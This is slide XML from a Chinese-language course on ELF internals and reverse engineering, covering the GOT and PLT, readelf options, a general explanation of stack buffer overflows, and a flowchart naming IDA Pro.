              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>并执行查找</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>i386</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>架构下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>除了每个函数占用一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>GOT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>表项外，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>GOT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>表项还保留了 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>个公共表项</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>每项</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>位</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>字节</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>保存在前三个位置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>分别是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>                        got[0]: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ELF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>动态段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(.dynamic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的装载地址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>                        got[1]: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ELF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>link_map</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>数据结构描述符地址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>                        got[2]: _</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>dl_runtime_resolve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>函数的地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>PLT:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>即</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Procedure Linkage Table, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>过程链接表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>. .plt节中包含了动态链接器调用从共享库导入的函数所必需的相关代码。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>可以用来</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>调用链接器来解析某个外部函数的地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>并填充到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>got.plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>然后跳转到该函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>或者 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(2)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>直接在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>got.plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>中查找并跳转到对应外部函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>如果已经填充过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"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sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="986790" y="959485"/>
            <a:ext cx="10447655" cy="5939155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>常用命令</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>readelf命令是Linux下的分析ELF文件的命令，这个命令在分析ELF文件格式时非常有用1、readelf -v       显示版本</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2、readelf -h       显示帮助</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3、readelf -a test           显示test的全部信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>4、readelf -h test           显示test的ELF Header的文件头信息（就是ELF文件开始的前52个字节）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>5、readelf -l test            显示test的Program Header Table中的每个Prgram Header Entry的信息（如果有）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>6、readelf -S test           显示test的Section Header Table中的每个Section Header Entry的信息（如果有）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>7、readelf -g test            显示test的Section Group的信息（如果有）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>8、readelf -s test            显示test的Symbol Table中的每个Symbol  Table Entry的信息（如果有）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>9、readelf -e test            显示test的全部头信息（包括ELF Header，Section Header和Program Header，等同与 readelf -h -l -S test）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>10、readelf -n test          显示test的note段的信息（如果有）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>11、readelf -r test           显示test中的可重定位段的信息（如果有）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>12、readelf -d test          显示test中的Dynamic Section的信息（如果有）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>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t>逆向分析</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1228090" y="1347470"/>
            <a:ext cx="10096500" cy="3107690"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>展示一个对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ELF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的栈溢出漏洞的利用。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>栈溢出：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     由于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>语言系列没有内置检查机制来确保复制到缓冲区的数据不得大于缓冲区的大小，因此当这个数据足够大的时候，将会溢出缓冲区的范围，溢出的数据会覆盖栈中其它数据，从而影响程序的运行。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="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sp>
        <p:nvSpPr>
          <p:cNvPr id="17411" name="流程图: 可选过程 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1767840" y="1488441"/>
            <a:ext cx="1843088" cy="100806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反汇编</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>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7412" name="流程图: 可选过程 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4330065" y="1488441"/>
            <a:ext cx="1843088" cy="100806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掌握模块结构及功能</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>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7413" name="流程图: 可选过程 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7066915" y="1488441"/>
            <a:ext cx="1843088" cy="100806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化为己用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="方正姚体" panose="02010601030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="方正姚体" panose="02010601030101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="方正姚体" panose="02010601030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17414" name="直接箭头连接符 6"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3609341" y="1991679"/>
            <a:ext cx="720725" cy="1587"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent3"/>
          </a:lnRef>
          <a:fillRef idx="2">
            <a:schemeClr val="accent3"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent3"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17415" name="直接箭头连接符 7"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="17412" idx="3"/>
            <a:endCxn id="17413" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6173153" y="1992314"/>
            <a:ext cx="893445" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent3"/>
          </a:lnRef>
          <a:fillRef idx="2">
            <a:schemeClr val="accent3"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent3"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17416" name="椭圆 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2933065" y="3215641"/>
            <a:ext cx="2089150" cy="136842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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>IDA Pro</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
